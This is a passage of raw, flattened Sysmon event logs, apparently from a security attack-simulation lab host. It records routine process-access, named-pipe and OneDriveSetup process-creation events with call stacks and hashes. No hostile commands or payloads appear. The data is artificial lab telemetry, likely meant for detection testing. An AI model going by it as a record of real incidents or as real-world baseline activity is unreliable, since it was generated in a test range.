10341000x800000000000000078337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.904{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.904{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.904{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.904{A7A01FEF-B626-607E-1600-00000000BB01}15401312C:\Windows\system32\svchost.exe{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\seclogon.dll+17dc|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000078333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.912{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe18.151.0729.0013Microsoft OneDrive SetupMicrosoft OneDriveMicrosoft CorporationOneDriveSetup.exeC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe /silent /peruser /childprocess /enableOMCTelemetry C:\Windows\system32\ATTACKRANGE\Administrator{A7A01FEF-C0A5-607E-58C6-320000000000}0x32c6582HighMD5=11D5E2EF5D9A0E009DF8CC61F4706982,SHA256=17A5F35C30B9D1DBB651686407DBF7D1BDCC685426581AF6796B364550E7FE70,IMPHASH=059AC5CD530DD28EAD72A380619D30D7{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe"C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe" /silent 10341000x800000000000000078332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.904{A7A01FEF-B626-607E-1300-00000000BB01}12644440C:\Windows\System32\svchost.exe{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.904{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBFF-607E-290E-00000000BB01}3924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 18141800x800000000000000078330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.904{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EBFF-607E-290E-00000000BB01}3924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.904{A7A01FEF-B626-607E-1600-00000000BB01}15401312C:\Windows\system32\svchost.exe{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.904{A7A01FEF-B626-607E-1600-00000000BB01}15401312C:\Windows\system32\svchost.exe{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.873{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBFF-607E-280E-00000000BB01}5672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.842{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBFF-607E-280E-00000000BB01}5672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.842{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EBFF-607E-280E-00000000BB01}5672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.795{A7A01FEF-B624-607E-0B00-00000000BB01}8604604C:\Windows\system32\lsass.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.795{A7A01FEF-B624-607E-0B00-00000000BB01}8604604C:\Windows\system32\lsass.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.795{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33085856C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+da5f9|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e3f4a|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e222d|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000078309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.795{A7A01FEF-B626-607E-1300-00000000BB01}12642404C:\Windows\System32\svchost.exe{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.779{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.779{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.779{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.779{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.779{A7A01FEF-C0A3-607E-6C05-00000000BB01}36241208C:\Windows\system32\csrss.exe{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.779{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33084668C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft 